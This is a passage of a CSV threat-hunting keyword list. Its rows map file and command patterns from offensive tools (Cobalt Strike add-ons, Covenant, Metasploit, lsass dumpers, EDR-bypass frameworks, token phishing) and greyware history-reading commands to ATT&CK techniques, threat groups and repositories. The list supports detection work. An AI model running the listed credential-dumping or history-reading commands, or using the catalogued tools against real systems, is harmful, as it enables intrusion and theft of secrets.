T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" +"*CACTUSTORCH.vbs*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" +"*caffix*amass*","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1590 - T1591 - T1592 - T1593 - T1594 - T1595","TA0009 - TA0011 - TA0007","N/A","N/A","Information Gathering","https://github.com/OWASP/Amass","1","0","N/A","N/A","10","10160","1761","2023-09-19T11:29:11Z","2018-07-10T16:05:08Z" +"*caffix/amass*","offensive_tool_keyword","Amass","In-depth subdomain enumeration tool that performs scraping. 
recursive brute forcing06/01/2021 crawling of web archives06/01/2021 name altering and reverse DNS sweeping","T1593 - T1594 - T1595 - T1567 - T1569","TA0007 - TA0009 - TA0004 - TA0005 - TA0011","N/A","N/A","Information Gathering","https://github.com/OWASP/Amass","1","0","N/A","N/A","10","10160","1761","2023-09-19T11:29:11Z","2018-07-10T16:05:08Z" +"*calebstewart/pwncat*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*-CalendarNTLMLeak*","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","1","N/A","N/A","4","340","64","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z" +"*CALLBACK_HASHDUMP*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - 
Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*CALLBACK_KEYSTROKES*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*CALLBACK_NETVIEW*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*CALLBACK_PORTSCAN*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*CALLBACK_TOKEN_STOLEN*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*CallBackDump*dumpXor*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" +"*CallbackDump.exe*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" +"*can_flood_frames*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*CandyPotato.exe *","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. 
This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","0","N/A","N/A","3","289","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" +"*canix1/ADACLScanner*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","1","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*Cannot enumerate antivirus*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*capcom_sys_exec*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*capcom_sys_exec.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*CaptainNox/Hypnos*","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","1","N/A","10","1","49","5","2023-08-22T20:17:31Z","2023-07-11T09:07:10Z" +"*captcha-killer.*.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*CapturedCredential.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CapturedCredential.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CapturedHashCredential.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CapturedPasswordCredential.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CapturedTicketCredential.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*capturetokenphish.ps1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*capturetokenphish.py*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - 
TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*CarbonCopy*","offensive_tool_keyword","CarbonCopy","A tool which creates a spoofed certificate of any online website and signs an Executable for AV Evasion. Works for both Windows and Linux","T1606 - T1553 - T1105 - T1027 - T1562","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/paranoidninja/CarbonCopy","1","0","N/A","N/A","10","1185","276","2020-10-03T03:23:20Z","2018-11-14T04:48:10Z" +"*CarbonCopy.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*cardano2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*careCrow*_linux_amd64*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*cargo install glit*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*carlospolop/PurplePanda*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. 
Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z" +"*cat *.atftp_history*","greyware_tool_keyword","cat","Enumerating user files history for interesting information","T1083 - T1005","TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*cat *.atftp_history*","greyware_tool_keyword","cat","show atftp history","T1552.002 - T1070.004","TA0005 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","2","9","N/A","N/A","N/A","N/A" +"*cat *.bash_history*","greyware_tool_keyword","cat","Enumerating user files history for interesting information","T1083 - T1005","TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*cat *.bash_history*","greyware_tool_keyword","cat","show bash history","T1552.002 - T1070.004","TA0005 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","2","9","N/A","N/A","N/A","N/A" +"*cat *.bin | base64 -w 0 > *.txt*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" +"*cat *.mysql_history*","greyware_tool_keyword","cat","Enumerating user files history for interesting information","T1083 - T1005","TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*cat *.mysql_history*","greyware_tool_keyword","cat","show mysql history","T1552.002 - T1070.004","TA0005 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","2","9","N/A","N/A","N/A","N/A" +"*cat *.nano_history*","greyware_tool_keyword","cat","Enumerating user files history for interesting information","T1083 - T1005","TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*cat *.nano_history*","greyware_tool_keyword","cat","show nano history","T1552.002 - T1070.004","TA0005 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","2","9","N/A","N/A","N/A","N/A" +"*cat *.ntds","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*cat *.php_history*","greyware_tool_keyword","cat","Enumerating user files history for interesting information","T1083 - T1005","TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*cat *.php_history*","greyware_tool_keyword","cat","show php history","T1552.002 - T1070.004","TA0005 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","2","9","N/A","N/A","N/A","N/A" +"*cat *.zsh_history*","greyware_tool_keyword","cat","show zsh history","T1552.002 - T1070.004","TA0005 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","2","9","N/A","N/A","N/A","N/A" +"*cat *.zsh_history*","greyware_tool_keyword","cat","Enumerating user files history for interesting information","T1083 - T1005","TA0007","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*cat 